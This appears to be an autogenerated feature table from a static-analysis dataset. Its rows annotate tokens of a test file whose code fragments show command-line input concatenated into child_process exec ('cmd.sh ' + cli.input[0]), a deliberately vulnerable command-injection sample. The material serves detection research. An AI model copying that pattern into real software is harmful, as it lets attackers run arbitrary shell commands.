autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli = m ... lags}}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli = m ... lags}}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:17 | meow | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:17 | meow | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:17 | meow | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:17 | meow | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:17 | meow | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | exceptional return of meow(`h ... lags}}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | exceptional return of meow(`h ... lags}}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | exceptional return of meow(`h ... lags}}) | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | exceptional return of meow(`h ... lags}}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | exceptional return of meow(`h ... lags}}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:19:114:30 | `helpstring` | CalleeFlexibleAccessPath | meow | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:19:114:30 | `helpstring` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:19:114:30 | `helpstring` | calleeImports | meow | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:19:114:30 | `helpstring` | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:19:114:30 | `helpstring` | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:19:114:30 | `helpstring` | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:19:114:30 | `helpstring` | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:19:114:30 | `helpstring` | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:20:114:29 | helpstring | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:20:114:29 | helpstring | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:20:114:29 | helpstring | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:20:114:29 | helpstring | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:20:114:29 | helpstring | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:20:114:29 | helpstring | stringConcatenatedWith | -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:33:114:51 | {flags: {...flags}} | CalleeFlexibleAccessPath | meow | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:33:114:51 | {flags: {...flags}} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:33:114:51 | {flags: {...flags}} | calleeImports | meow | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:33:114:51 | {flags: {...flags}} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:33:114:51 | {flags: {...flags}} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:33:114:51 | {flags: {...flags}} | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:33:114:51 | {flags: {...flags}} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:33:114:51 | {flags: {...flags}} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:38 | flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:38 | flags | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:38 | flags | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:38 | flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:38 | flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:34:114:50 | flags: {...flags} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | CalleeFlexibleAccessPath | meow | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | InputAccessPathFromCallee | 1.flags | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | assignedToPropName | flags | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | calleeImports | meow | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:41:114:50 | {...flags} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | CalleeFlexibleAccessPath | meow | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | InputAccessPathFromCallee | 1.flags.? | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | calleeImports | meow | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:42:114:49 | ...flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:45:114:49 | flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:45:114:49 | flags | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:45:114:49 | flags | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:45:114:49 | flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:45:114:49 | flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:3 | cp | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:8 | cp.exec | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | cp.exec ... put[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | cp.exec ... put[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | cp.exec ... put[0]) | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | cp.exec ... put[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | cp.exec ... put[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | exceptional return of cp.exec ... put[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | exceptional return of cp.exec ... put[0]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | exceptional return of cp.exec ... put[0]) | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | exceptional return of cp.exec ... put[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | exceptional return of cp.exec ... put[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:5:116:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:5:116:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:5:116:8 | exec | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:5:116:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:5:116:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:18 | "cmd.sh " | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- cli.input.0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:24 | cli | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:24 | cli | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:24 | cli | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:24 | cli | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:24 | cli | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:30 | cli.input | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:30 | cli.input | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:30 | cli.input | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:30 | cli.input | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:30 | cli.input | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:33 | cli.input[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:33 | cli.input[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:33 | cli.input[0] | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:33 | cli.input[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:33 | cli.input[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:22:116:33 | cli.input[0] | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:26:116:30 | input | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:26:116:30 | input | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:26:116:30 | input | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:26:116:30 | input | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:26:116:30 | input | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:32:116:32 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:32:116:32 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:32:116:32 | 0 | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:32:116:32 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:32:116:32 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:1:130:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:1:130:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:1:130:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | cp | contextFunctionInterfaces | | +| 